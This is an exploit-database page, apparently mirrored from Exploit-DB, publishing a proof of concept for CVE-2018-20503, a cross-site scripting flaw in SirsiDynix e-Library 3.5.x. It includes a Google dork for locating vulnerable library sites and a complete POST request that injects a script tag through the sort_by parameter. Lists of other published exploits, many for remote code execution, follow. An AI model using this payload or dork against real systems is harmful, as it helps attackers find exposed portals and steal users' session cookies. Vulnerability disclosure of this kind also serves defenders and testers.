Search for hundreds of thousands of exploits

"SirsiDynix e-Library 3.5.x - Cross-Site Scripting"

Author

Exploit author

AkkuS

Platform

Exploit platform

cgi

Release date

Exploit published date

2019-01-24

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
# Exploit Title: SirsiDynix e-Library <= 3.5.x - Cross-Site Scripting
# CVE: CVE-2018-20503
# Date: 2019-24-01
# Google Dork: inurl:/x/x/0/49
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Contact: https://pentest.com.tr
# Vendor Homepage: http://www.sirsidynix.com
# Version: 3.5.x
# Category: Webapps
# Tested on: Firefox/52 and Chrome/69
# Software Description : As SirsiDynix Symphonys core discovery portal,
e-Library gives
# Symphony users the basic tools they need to find the resources they seek.
# e-Library offers users speedy and relevant search results as well as a
user-friendly interface to make discovery simple
# Description : Exploiting these issues could allow an attacker to steal
cookie-based authentication credentials,
# compromise the application, access or modify data, or exploit latent
vulnerabilities in the underlying database.
# SirsiDynix e-Library 3.5.x is vulnerable; prior versions may also be
affected.
# ==================================================================

# PoC:

# POST Request (sort_by):

POST /uhtbin/cgisirsi/?ps=0Sk8zSpD0f/MAIN/33660028/123 HTTP/1.1
Host: target
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
http://target/uhtbin/cgisirsi/?ps=mmRoXTc0L3/MAIN/33660028/38/1/X/BLASTOFF
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 146

searchdata1=test&srchfield1=AU%5EAUTHOR%5EAUTHORS%5EAuthor+Processing%5EYazar&library=VLK&srch_history=--%C3%96nceki+soruyu+se%C3%A7--&sort_by=ANYhadvi%22%3e%3cscript%3ealert(1)%3c%2fscript%3eox0ix

==================================================================
Release DateTitleTypePlatformAuthor
2020-07-07"Joomla! J2 JOBS 1.3.0 - 'sortby' Authenticated SQL Injection"webappsphp"Mehmet Kelepçe"
2020-07-07"Sickbeard 0.1 - Remote Command Injection"webappshardwarebdrake
2020-07-07"Online Shopping Portal 3.1 - 'email' SQL Injection"webappsphpgh1mau
2020-07-07"BSA Radar 1.6.7234.24750 - Authenticated Privilege Escalation"webappsmultiple"William Summerhill"
2020-07-07"Microsoft Windows mshta.exe 2019 - XML External Entity Injection"remotexmlhyp3rlinx
2020-07-06"Grafana 7.0.1 - Denial of Service (PoC)"doslinuxmostwanted002
2020-07-06"Fire Web Server 0.1 - Remote Denial of Service (PoC)"doswindows"Saeed reza Zamanian"
2020-07-06"Nagios XI 5.6.12 - 'export-rrd.php' Remote Code Execution"webappsphp"Basim Alabdullah"
2020-07-06"File Management System 1.1 - Persistent Cross-Site Scripting"webappsphpKeopssGroup0day_Inc
2020-07-06"RiteCMS 2.2.1 - Authenticated Remote Code Execution"webappsphp"Enes Özeser"
Release DateTitleTypePlatformAuthor
2020-03-11"CTROMS Terminal OS Port Portal - 'Password Reset' Authentication Bypass (Metasploit)"remotelinuxAkkuS
2019-08-12"Webmin 1.920 - Unauthenticated Remote Code Execution (Metasploit)"remotelinuxAkkuS
2019-08-12"ManageEngine Application Manager 14.2 - Privilege Escalation / Remote Command Execution (Metasploit)"remotemultipleAkkuS
2019-08-12"ManageEngine OpManager 12.4x - Privilege Escalation / Remote Command Execution (Metasploit)"remotemultipleAkkuS
2019-08-12"ManageEngine OpManager 12.4x - Unauthenticated Remote Command Execution (Metasploit)"remotemultipleAkkuS
2019-07-12"Sahi Pro 8.0.0 - Remote Command Execution"webappsjavaAkkuS
2019-06-17"AROX School-ERP Pro - Unauthenticated Remote Command Execution (Metasploit)"remotephpAkkuS
2019-06-11"Webmin 1.910 - 'Package Updates' Remote Command Execution (Metasploit)"remotelinuxAkkuS
2019-05-14"PHP-Fusion 9.03.00 - 'Edit Profile' Remote Code Execution (Metasploit)"remotephpAkkuS
2019-04-30"Moodle 3.6.3 - 'Install Plugin' Remote Command Execution (Metasploit)"remotephpAkkuS
2019-04-25"osTicket 1.11 - Cross-Site Scripting / Local File Inclusion"webappsphpAkkuS
2019-04-22"ManageEngine Applications Manager 14.0 - Authentication Bypass / Remote Command Execution (Metasploit)"remotemultipleAkkuS
2019-04-18"ManageEngine Applications Manager 11.0 < 14.0 - SQL Injection / Remote Code Execution (Metasploit)"remotewindowsAkkuS
2019-04-15"CuteNews 2.1.2 - 'avatar' Remote Code Execution (Metasploit)"remotephpAkkuS
2019-04-12"ATutor < 2.2.4 - 'file_manager' Remote Code Execution (Metasploit)"webappsphpAkkuS
2019-04-03"TeemIp IPAM < 2.4.0 - 'new_config' Command Injection (Metasploit)"remotephpAkkuS
2019-03-11"OpenKM 6.3.2 < 6.3.7 - Remote Command Execution (Metasploit)"webappsjspAkkuS
2019-03-11"Liferay CE Portal < 7.1.2 ga3 - Remote Command Execution (Metasploit)"webappsmultipleAkkuS
2019-03-07"QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)"remotehardwareAkkuS
2019-03-04"Booked Scheduler 2.7.5 - Remote Command Execution (Metasploit)"webappsphpAkkuS
2019-02-28"Usermin 1.750 - Remote Command Execution (Metasploit)"webappslinuxAkkuS
2019-02-28"Feng Office 3.7.0.5 - Remote Command Execution (Metasploit)"webappsphpAkkuS
2019-02-12"Jenkins 2.150.2 - Remote Command Execution (Metasploit)"webappslinuxAkkuS
2019-01-24"SirsiDynix e-Library 3.5.x - Cross-Site Scripting"webappscgiAkkuS
2019-01-18"Webmin 1.900 - Remote Command Execution (Metasploit)"remotecgiAkkuS
2019-01-10"eBrigade ERP 4.5 - Arbitrary File Download"webappsphpAkkuS
2019-01-02"Vtiger CRM 7.1.0 - Remote Code Execution"webappsphpAkkuS
2018-12-19"Rukovoditel Project Management CRM 2.3.1 - Remote Code Execution (Metasploit)"webappsphpAkkuS
2018-12-09"i-doit CMDB 1.11.2 - Remote Code Execution"webappsphpAkkuS
2018-12-04"Dolibarr ERP/CRM 8.0.3 - Cross-Site Scripting"webappsphpAkkuS
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46237/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.